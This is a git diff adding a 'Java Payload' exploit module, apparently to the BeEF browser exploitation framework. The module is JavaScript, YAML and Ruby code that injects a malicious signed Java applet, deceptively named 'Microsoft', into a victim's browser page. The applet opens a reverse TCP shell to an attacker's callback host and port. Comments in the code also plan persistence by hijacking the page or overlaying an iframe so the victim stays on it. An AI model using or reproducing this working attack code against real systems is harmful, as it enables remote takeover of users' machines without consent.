diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/java_payload/AppletReverseTCP-0.2.jar
new file mode 100644
index 000000000..8959c4ed9
Binary files /dev/null and b/modules/exploits/java_payload/AppletReverseTCP-0.2.jar differ
diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar
new file mode 100644
index 000000000..2c38c932d
Binary files /dev/null and b/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar differ
diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/java_payload/command.js
new file mode 100755
index 000000000..6a522237a
--- /dev/null
+++ b/modules/exploits/java_payload/command.js
@@ -0,0 +1,54 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var conn = '<%= @conn %>';
+ var cbHost = '<%= @cbHost %>';
+ var cbPort = '<%= @cbPort %>';
+ var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
+ var applet_id = '<%= @applet_id %>';
+ var applet_name = '<%= @applet_name %>';
+
+ beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
+ applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
+
+
+ //TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
+ //TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
+
+
+//TODO: =========== persistence techniques ===========
+// the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
+// download platform dependent executable (i.e. meterpreter) and then kill the applet.
+// we have 2 options:
+// 1. use the MITB code (currently doesn't work on IE)
+// 2. create an overlay iFrame while having the applet runnin in the background
+//
+// 1. setTimeout(beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
+// 2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
+// var MITBload = setInterval(function(){
+// if(beef.pageIsLoaded){
+// clearInterval(MITBload);
+// beef.mitb.hook();
+// }
+// }, 100);
+
+
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
+
+
+});
diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/java_payload/config.yaml
new file mode 100755
index 000000000..468dd9228
--- /dev/null
+++ b/modules/exploits/java_payload/config.yaml
@@ -0,0 +1,26 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ java_payload:
+ enable: true
+ category: "Exploits"
+ name: "Java Payload"
+ description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.
Before launching it, be sure to have the JavaPayload StagerHandler listening
, i.e.: java javapayload.handler.stager.StagerHandler -- JSh"
+ authors: ["antisnatchor"]
+ target:
+ not_working: ["FF"]
+ user_notify: ["All"]
\ No newline at end of file
diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/java_payload/module.rb
new file mode 100755
index 000000000..e21d6aaef
--- /dev/null
+++ b/modules/exploits/java_payload/module.rb
@@ -0,0 +1,37 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Java_payload < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+ end
+
+
+ def self.options
+ return [
+ {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
+ {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => '192.168.56.1'},
+ {'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
+ {'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
+ {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end